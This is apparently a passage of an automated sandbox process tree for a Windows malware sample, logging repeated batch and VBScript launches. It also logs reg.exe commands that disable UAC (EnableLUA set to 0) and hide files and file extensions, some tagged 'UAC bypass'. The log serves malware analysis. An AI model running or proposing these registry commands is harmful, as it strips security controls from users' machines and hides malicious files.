        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hIUsccwo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        166⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        167⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        164⤵
        Modifies registry key
        
        PID:224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        164⤵
        Modifies registry key
        
        PID:3340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUMAssgQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        164⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        165⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        164⤵
        
        PID:3732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        165⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        162⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        162⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        162⤵
        UAC bypass
        Modifies registry key
        
        PID:3928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WmIUEUsQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        162⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        163⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        160⤵
        
        PID:4964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        160⤵
        
        PID:1684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        UAC bypass
        
        PID:1808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        160⤵
        UAC bypass
        
        PID:3736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yAoAQYkE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        160⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        161⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HyowwsAQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        158⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        159⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        158⤵
        
        PID:5012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        159⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        158⤵
        
        PID:4612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        159⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        158⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        156⤵
        UAC bypass
        
        PID:1256
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZSkMkMkA.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        156⤵
        
        PID:584
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        157⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        156⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        156⤵
        
        PID:4780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        154⤵
        
        PID:552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        154⤵
        Modifies registry key
        
        PID:776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        154⤵
        Modifies registry key
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nskcUwQk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        154⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        155⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bOYUAYYc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        152⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        153⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        152⤵
        UAC bypass
        Modifies registry key
        
        PID:3192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        152⤵
        
        PID:388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        152⤵
        Modifies registry key
        
        PID:3052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqsQMMoo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        150⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        151⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        150⤵
        UAC bypass
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        150⤵
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        150⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IEQAEUoY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        148⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        149⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        148⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        148⤵
        
        PID:8
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        148⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KWQQwQEQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        146⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        147⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:3880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        146⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        146⤵
        
        PID:3248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        147⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        146⤵
        
        PID:812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        144⤵
        
        PID:216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        144⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        145⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\acwkYMsM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        144⤵
        
        PID:1208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        145⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        145⤵
        
        PID:404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        144⤵
        
        PID:552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        145⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vYAMIccY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        142⤵
        
        PID:4440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        143⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        142⤵
        Modifies registry key
        
        PID:4676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        142⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        142⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        140⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        140⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        140⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lkgkcYEk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        140⤵
        
        PID:2716
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        141⤵
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        138⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nkswYcAc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        138⤵
        
        PID:3880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        139⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        139⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        138⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        138⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        136⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TskQwswo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        136⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        137⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        136⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        136⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WAYcwYUo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        134⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        135⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        134⤵
        
        PID:4012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        134⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        134⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWsYMssM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        132⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        133⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        UAC bypass
        
        PID:2380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SWUQcQsI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        130⤵
        
        PID:404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        Modifies registry key
        
        PID:1660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AmccsQMk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        128⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        UAC bypass
        
        PID:4420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nCEIUgsc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        126⤵
        
        PID:4684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        127⤵
        UAC bypass
        
        PID:1220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        UAC bypass
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\raIoUsEk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        124⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        
        PID:3048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        123⤵
        
        PID:496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LeQwMAME.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        122⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        121⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nYQskAAI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        120⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        121⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        
        PID:4592
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        119⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        
        PID:2412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        119⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KIAoEUwY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        118⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugQEUAUg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        116⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\cmd.exe
        
